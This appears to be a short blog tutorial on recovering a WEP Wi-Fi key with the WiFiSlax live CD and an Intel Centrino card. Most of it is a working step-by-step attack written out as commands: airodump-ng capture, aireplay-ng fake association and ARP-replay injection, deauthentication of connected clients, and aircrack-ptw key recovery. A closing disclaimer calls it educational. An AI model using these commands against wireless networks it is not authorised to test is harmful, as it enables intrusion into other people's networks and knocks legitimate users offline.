This tutorial show your how to retrieve WEP Key using WiFiSlax and Intel Centrino Chipset.

Requirement

  • Notebook with Intel Centrino Chipset 2200 above
  • WiFiSlax 3.1 (Download)
  • Cup of coffee with two cigarettes ;p

Instruction

  1. Download WiFISlax image and burn to CD
  2. Boot the notebook using the CD
  3. Login using “root” and password is “toor
  4. Once started, open the X:
    startx
    Note: This CD contains Spanish language, use Google Translate if needed

Step 1: Load Driver

  1. To load Intel driver, click K Menu > Asistencia Chipset > Asistencia Intel pro wireless > Cargar ipw3945 injection (depend on your chipset)
  2. To find target Channel, use Kismet to scan all network wireless (K Menu > Wifislax > Herramientas Wireless > Kismet)

Step 2: Start Capturing

  1. Set the channel of the Access Point in the NIC 
    echo 'Channel‘ > /sys/class/net/wifi0/device/channel
  2. Scan all wireless network to get the BSSID and the ESSID type: 
    airodump-ng rtap0

    Finish the execution with CONTROL-C

  3. Set the BSSID in the NIC 
    echo 'BSSID‘ > /sys/class/net/wifi0/device/bssid
  4. Start capturing using the command 
    airodump-ng -c CHANNEL -w /path/to/save/OUTPUT_FILE rtap0

Step 3: Injection Traffic

  1. Capturing take a while so open new terminal window and set speed 2Mbps: 
    echo '2' > /sys/class/net/wifi0/device/rate
  2. Activate the NIC: 
    ifconfig wifi0 up
  3. Look at your MAC address
  4. Initiate an association with the Access Point 
    aireplay-ng -1 0 AP_BSSID -h YOUR_MAC_ADDRESS_WIFI -e AP_ESSID wifi0
  5. Start the injection traffic: 
    aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h YOUR_MAC_ADDRESS_WIFI wifi0

    This should increment the number of data in capture window.

Step 4: Deauthenticate clients if needed

Deauthenticate Clients if needed to increase the ARP request capture, type:

aireplay-ng -0 15 -a AP_BSSID -c CLIENT_MAC_ADDRESS_WIFI wifi0

Step 5: Apply Aircrack-PTW

When the data packet between 40,000 and 85,000+ data, extract the key by executing:
aircrack-ptw /path/to/save/OUTPUT_FILE.cap
and voila..

Found key with len 05: XX XX XX XX XX

where XX XX XX XX is WEP Key

This is manual tip using WIfiSlax. I will give you easy way how to retrieve WEP key using the same tool..

DISCLAIMER: This is for testing environment and educational purpose only. I cannot guarantee the accuracy or validity of the material submitted. You agree that your use of the tips and your reliance on any questions, answers, information or other materials received through this site is at your own risk.